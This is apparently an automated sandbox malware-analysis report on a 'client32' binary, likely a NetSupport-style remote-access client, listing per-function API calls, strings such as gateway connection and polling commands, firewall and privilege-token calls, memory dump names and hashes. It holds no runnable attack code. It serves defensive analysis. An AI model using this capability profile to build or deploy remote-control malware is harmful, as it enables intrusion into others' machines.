                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
                                                                                                                        • String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
                                                                                                                        • API String ID: 692187944-2561115898
                                                                                                                        • Opcode ID: e5e2543116c1c178c8091a40c7a64bb7115ccdae992da7a805c5cec0014acb38
                                                                                                                        • Instruction ID: 19e6a8f323f29c85e24850b2e4ca5934d0a94c2982567c8896835727aa1d9333
                                                                                                                        • Opcode Fuzzy Hash: e5e2543116c1c178c8091a40c7a64bb7115ccdae992da7a805c5cec0014acb38
                                                                                                                        • Instruction Fuzzy Hash: D5E19375A402149FDF11DF68D890BEDB3B5EF88315F8041AAED19A7280DB709E84CFA5
                                                                                                                        APIs
                                                                                                                        • #16.WSOCK32(00000000,?,a3Zh,00000000,00000000,?,00000007), ref: 6859924C
                                                                                                                        • WSAGetLastError.WSOCK32(00000000,?,a3Zh,00000000,00000000,?,00000007), ref: 6859925B
                                                                                                                        • GetTickCount.KERNEL32 ref: 68599274
                                                                                                                        • Sleep.KERNEL32(00000001,00000000,?,a3Zh,00000000,00000000,?,00000007), ref: 685992A8
                                                                                                                        • GetTickCount.KERNEL32 ref: 685992B0
                                                                                                                        • Sleep.KERNEL32(00000014), ref: 685992BC
                                                                                                                        Strings
                                                                                                                        • ReadSocket - Error %d reading response, xrefs: 685992F7
                                                                                                                        • *RecvTimeout, xrefs: 6859927B
                                                                                                                        • a3Zh, xrefs: 68599244
                                                                                                                        • ReadSocket - Would block, xrefs: 6859928A
                                                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 68599226
                                                                                                                        • ReadSocket - Connection has been closed by peer, xrefs: 685992E0
                                                                                                                        • hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 6859922B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CountSleepTick$ErrorLast
                                                                                                                        • String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$a3Zh$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
                                                                                                                        • API String ID: 2495545493-1096684884
                                                                                                                        • Opcode ID: b5925360083a57d19c58249876366d12ba0b5fca48a5ea9abd192e68da549f5a
                                                                                                                        • Instruction ID: edc879204cff4bdf9013b3b646520309aa2927875271b2d62d72d76eb8c5f498
                                                                                                                        • Opcode Fuzzy Hash: b5925360083a57d19c58249876366d12ba0b5fca48a5ea9abd192e68da549f5a
                                                                                                                        • Instruction Fuzzy Hash: 2031A23AE80248EFDF10DFBCE988B9EB7F4EB85315F8044A9E908D7140E73199508B91
                                                                                                                        APIs
                                                                                                                        • GetSystemTime.KERNEL32(?,?,?,97A2354D,89DA8021,97A234B3,FFFFFFFF,00000000), ref: 685A31E2
                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,685CECB0), ref: 685A31EC
                                                                                                                        • GetSystemTime.KERNEL32(?,89DA8021,97A234B3,FFFFFFFF,00000000), ref: 685A322A
                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,685CECB0), ref: 685A3234
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898,?,97A2354D), ref: 685A32BE
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 685A32D3
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 685A334D
                                                                                                                          • Part of subcall function 685ABA20: __strdup.LIBCMT ref: 685ABA3A
                                                                                                                          • Part of subcall function 685ABB00: _free.LIBCMT ref: 685ABB2D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
                                                                                                                        • String ID: 1.1$ACK=1$CMD=POLL$INFO=1
                                                                                                                        • API String ID: 1510130979-3441452530
                                                                                                                        • Opcode ID: 45c4023052b712fd4c58dc05647e5a7416511ec50250fa07931a60422d5bb665
                                                                                                                        • Instruction ID: 49227012a016f7c2ab4a82d9b13a2c96863fc9b37b58f8714e9526c00b33a5b1
                                                                                                                        • Opcode Fuzzy Hash: 45c4023052b712fd4c58dc05647e5a7416511ec50250fa07931a60422d5bb665
                                                                                                                        • Instruction Fuzzy Hash: B4614176904208EFCF14DFA4D884EEEB7B9FF49314F84451EE816A7240EB34A944CBA5
                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 11095CA4
                                                                                                                        • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,11134B2B), ref: 11095CBE
                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000001,111BBFCC,?,?,?,?,?,?,?,11134B2B), ref: 11095CDB
                                                                                                                        • CoUninitialize.OLE32(?,?,?,?,?,?,11134B2B), ref: 11095CF9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                                                        • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                                                        • API String ID: 3222248624-258972079
                                                                                                                        • Opcode ID: a191ec028fc1ebe43799a3fbc6b5824768ffae445ee9dba88daea3a8dfe179cf
                                                                                                                        • Instruction ID: 667ad4978e11a958ff0dee1adaae51f217c5ac115a2c6bb433f56a1af31716a4
                                                                                                                        • Opcode Fuzzy Hash: a191ec028fc1ebe43799a3fbc6b5824768ffae445ee9dba88daea3a8dfe179cf
                                                                                                                        • Instruction Fuzzy Hash: E011C2B0F0112D5FDB01DBE68C94AAFFB69AF04704F108569EA09D7244E722EE40C7E2
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset
                                                                                                                        • String ID: NBCTL32.DLL$_License$serial_no
                                                                                                                        • API String ID: 2102423945-35127696
                                                                                                                        • Opcode ID: 73eab7b1c8d7b6e70f1aa5dd4ab6e6844c03489425f04d6019e1d2487717588b
                                                                                                                        • Instruction ID: d0e0b9ecbde65a2366102896099e84d523940e720fd040d90542ba2888ebc4af
                                                                                                                        • Opcode Fuzzy Hash: 73eab7b1c8d7b6e70f1aa5dd4ab6e6844c03489425f04d6019e1d2487717588b
                                                                                                                        • Instruction Fuzzy Hash: CAB1A075E00219AFEB04CF98DC91FAEB7F5FF88304F148169E9599B295DB70A901CB90
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(1102DF30,?,00000000), ref: 11030B34
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID: Client32$NSMWClass$NSMWClass
                                                                                                                        • API String ID: 3192549508-611217420
                                                                                                                        • Opcode ID: 58515847b78de4ae681c1499d6e223a9096c2b5aadf525ec481539d2362be3c4
                                                                                                                        • Instruction ID: 7da52f349ca3cb7d8c11f8ab613c71e219a3e37bd0be996a8dda4c31b38bef83
                                                                                                                        • Opcode Fuzzy Hash: 58515847b78de4ae681c1499d6e223a9096c2b5aadf525ec481539d2362be3c4
                                                                                                                        • Instruction Fuzzy Hash: 9901D674E0132EDFD346DFE4C8859AAFBB5EB8571CB148479D82887308FA71A904CB91
                                                                                                                        APIs
                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,74DEF550,?,00000000), ref: 1109DC58
                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109DC74
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00470EF8,00470EF8,00470EF8,00470EF8,00470EF8,00470EF8,00470EF8,111EAB1C,?,00000001,00000001), ref: 1109DCA0
                                                                                                                        • EqualSid.ADVAPI32(?,00470EF8,?,00000001,00000001), ref: 1109DCB3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InformationToken$AllocateEqualInitialize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1878589025-0
                                                                                                                        • Opcode ID: e1ef01c0b2a593c632c16c9fc194400e1d79a88dd1ec3329169a1e99986687c3
                                                                                                                        • Instruction ID: 4e420e32a86b216a8c4820a584475d55105e440134d2483d273bcb85c3c049ac
                                                                                                                        • Opcode Fuzzy Hash: e1ef01c0b2a593c632c16c9fc194400e1d79a88dd1ec3329169a1e99986687c3
                                                                                                                        • Instruction Fuzzy Hash: A1214F71B4122EAFEB00DBA5DC91FBFF7B9EF44744F004069E915D7280E6B1A9018791
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(000F01FF,?,1102FAC3,00000000,00000000,00080000,7E4636A2,00080000,00000000,00000000), ref: 1109C77D
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 1109C784
                                                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109C795
                                                                                                                        • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109C7B9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2349140579-0
                                                                                                                        • Opcode ID: fed7014fb2c6176395dd00bdbf9b6dacad7388df0a8d1a1889bfa0ec87585418
                                                                                                                        • Instruction ID: 79ef21a039d637d1c16a726e2430049afe469fda3395ab205b54f21d4569a753
                                                                                                                        • Opcode Fuzzy Hash: fed7014fb2c6176395dd00bdbf9b6dacad7388df0a8d1a1889bfa0ec87585418
                                                                                                                        • Instruction Fuzzy Hash: 7B014071600219AFD710DF94CC89BAEF7BCEB44705F108469EA05D7240D7B06904CB61
                                                                                                                        APIs
                                                                                                                        • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109DB20,00000244,cant create events), ref: 1109C7FC
                                                                                                                        • CloseHandle.KERNEL32(?,00000000,1109DB20,00000244,cant create events), ref: 1109C805
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 81990902-0
                                                                                                                        • Opcode ID: 07b6c080e2ef9d1b524653a43e28c47792f2e6050ec9e1d6ef6176c43a5e0348
                                                                                                                        • Instruction ID: 2330733e60bf6a127bb8479b673e73a50ba3166191bfb56ce9f8e109ae2e049c
                                                                                                                        • Opcode Fuzzy Hash: 07b6c080e2ef9d1b524653a43e28c47792f2e6050ec9e1d6ef6176c43a5e0348
                                                                                                                        • Instruction Fuzzy Hash: 09E0EC71A00611ABE738CE249D95FA777ECAF08B11F21496DF956E6180CAA0E8448B64
                                                                                                                        APIs
                                                                                                                        • GetSystemMetrics.USER32(00002000), ref: 1102E234
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E266
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateEventMetricsSystem
